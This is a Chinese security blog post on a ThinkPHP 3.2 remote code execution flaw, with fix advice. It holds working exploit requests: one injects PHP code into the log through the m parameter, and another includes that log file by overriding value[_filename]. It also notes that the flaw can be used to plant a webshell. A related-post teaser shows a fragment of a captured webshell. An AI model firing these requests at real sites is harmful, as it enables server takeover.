当前位置:首页 > 网络安全交流 > 正文内容

ThinkPHP 3.2远程代码执行漏洞

14324472931年前 (2024-04-07)网络安全交流849

ThinkPHP 3.2远程代码执行漏洞,该漏洞产生原因是由于在业务代码中如果对模板赋值方法assign的第一个参数可控,则导致模板路径变量被覆盖为携带攻击代码路径,造成文件包含,代码执行等危害。

复现:

https://网址/index.php?m=--><?=phpinfo();?>

目的:通过错误的m参数导致thinkphp报错,写入至日志文件

https://网址/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_04_07.log      log文件名为当前日期

通过篡改模板文件的路径导致被注入的在此处执行,通过该注入方式,将可以上传webshell获取网站的最终权限。
该漏洞在thinkphp 3.2.5内已修复

修复建议:
1.修改日志文件的命名规则,加入随机字符串来防止被猜测数文件名称。
2.限制模板文件的引用后缀名检查,防止越界访问文件。

扫描二维码推送至手机访问。

版权声明:本文由爱开发博客发布,如需转载请注明出处。

本文链接:https://www.lovekf.cn/?id=20

分享给朋友:

“ThinkPHP 3.2远程代码执行漏洞” 的相关文章

那些被拦截到的php小马3

<?php if (!defined('THINK_PATH')) exit(); file_put_contents ('wordpass.php', urldecode (urldecod...

frps服务器上有网站如何不影响映射其他域名

文章又名:frp和Nginx(宝塔一类的设备共存)这个方法利用的是nginx做转发,把没有在服务器使用的泛域名其他的解析到frp上的https和http端口,然后再在Nginx Proxy Manager上转发到对应的站点,此办法有一个小小的缺点,证书过期后需要服务器重新更换证书,后期将尝试解决方案...

docker镜像chishin/nginx-proxy-manager-zh疑似有后门程序

docker镜像chishin/nginx-proxy-manager-zh疑似有后门程序

服务器内部安装了汉化版的chishin/nginx-proxy-manager-zh镜像,突然发现cpu异常排除发现此镜像内部tcd进程异常,占用大量cpu。分析tcd进程发现大量异常连接请求...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。